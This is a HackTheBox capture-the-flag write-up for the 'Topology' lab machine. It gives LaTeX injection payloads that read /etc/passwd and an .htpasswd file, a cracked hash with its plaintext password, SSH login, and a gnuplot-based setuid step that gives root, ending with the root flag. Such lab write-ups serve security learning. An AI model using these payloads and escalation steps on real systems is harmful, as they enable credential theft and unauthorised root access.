---
# System prepended metadata

title: HACKTHEBOX

---

# HACKTHEBOX

# Topology

![](https://hackmd.io/_uploads/B1awJW-33.png)

## Creating Host

`sudo vim etc/hosts/`

add host as 10.10.11.217      topology.htb

Link: http://topology.htb/

## Scanning

`nmap -A -sV 10.10.11.217`

![](https://hackmd.io/_uploads/SkZYyZ-2h.png)


Visit http://topology.htb/

![](https://hackmd.io/_uploads/HyntkZW33.png)

Found LaTeX Equation Generator but couldn’t redirect so adding this host name in `etc/hosts/`

Had no idea about this website so searched Latex equation vulnerabilities and found **[Formula/CSV/Doc/LaTeX Injection - HackTricks](https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjxqeuszsyAAxVrzjgGHUAJC5EQFnoECA4QAQ&url=https%3A%2F%2Fbook.hacktricks.xyz%2Fpentesting-web%2Fformula-doc-latex-injection&usg=AOvVaw1n_NXF4m8WzMsGaABeQ7Vg&opi=89978449).**

![](https://hackmd.io/_uploads/HyF5y-Zhn.png)


![](https://hackmd.io/_uploads/SJ1o1Wb2h.png)


Now I wanted to read files from Latex code generator

command: `\input{/etc/passwd}`

💡 It's latex language issue , when I execute command its in "text" mode by adding $ it goes into "math mode" to calculate and execute equations

command: `$\input{/etc/passwd}$`

As we know /etc/passwd file is used **to keep track of every registered user that has access to a system.**

command: `$\lstinputlisting{/etc/passwd}$`
![](https://hackmd.io/_uploads/HklzWW-hh.jpg)

Nothing much could be found here, let’s scan for some directories.

## Scanning for Subdomains

Command:  `wfuzz -c --hc=404 --hw=545 -t 200 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.topology.htb" http://topology.htb`

![](https://hackmd.io/_uploads/rk9wZZ-33.png)

Add dev.topology.htb and stats.topology.htb to `etc/hosts/`

![](https://hackmd.io/_uploads/SJL2ZWbn2.png)


Now we need to bypass this authenication, as we have seen this domain is running on Apache/2.4.41

![](https://hackmd.io/_uploads/Hy3nbb-hh.png)


🔗 Bypass Apache/2.4.41 401 Unauthorized:  [https://www.vidocsecurity.com/blog/401-and-403-bypass-how-to-do-it-right/](https://www.vidocsecurity.com/blog/401-and-403-bypass-how-to-do-it-right/)

Command: `$\lstinputlisting{/var/www/dev/.htpasswd}$`

![](https://hackmd.io/_uploads/ByYpWZ-n2.png)


Finally found a Hash as a .PNG file.

![](https://hackmd.io/_uploads/HkP0-Zbhn.png)


Hash: `vdaisley : $apr1$1ONUB/S2$58eeNVirnRDB5zAIbIxTY0`

## Hash Cracking using John

command: `john --wordlist=/usr/share/wordlists/rockyou.txt hash`

![](https://hackmd.io/_uploads/ryUyM--2h.png)


Output `?:calculus20`

![](https://hackmd.io/_uploads/Sk1ezWb2n.png)


As see in our initial Nmap scan we have few SSH ports open.

## Connect to SSH

command: `ssh vdaisley@topology.htb`

password: `calculus20`

![](https://hackmd.io/_uploads/ByXWG-Z33.png)


For user flag

command: `cat user.txt`

Gaining Root access

![](https://hackmd.io/_uploads/SkxTZzZWh2.png)


Nothing interesting found here, except a executable “pspy64”. 

💡 pspy is a command line tool designed **to snoop on processes without need for root permissions**.

command: `./pspy64`

![](https://hackmd.io/_uploads/BkAMfbb3n.png)

![](https://hackmd.io/_uploads/ry8QzW-32.png)


command: `/opt/gnuplot`

command: `ls`

Output: `ls: cannot open directory '.': Permission denied`

Create a file within gnuplot dir

command  bash-5.0$ `nano /opt/gnuplot/root.plt`

Reverse Shell - root.plt must contain `system “chmod u+s”`

command: `bash -p` 

```
-p  Turned on whenever the real and effective user ids do not match.
            Disables processing of the $ENV file and importing of shell
            functions.  Turning this option off causes the effective uid and
            gid to be set to the real uid and gid.
```

command: `whoami`   →  root

Obtained the root access. Now, move on to root dir.

command: `cd /root`

`ls` 

`cat root.txt`

Here is the root flag

Output: `bb6b6780329a215d36126b6d6af62f1f`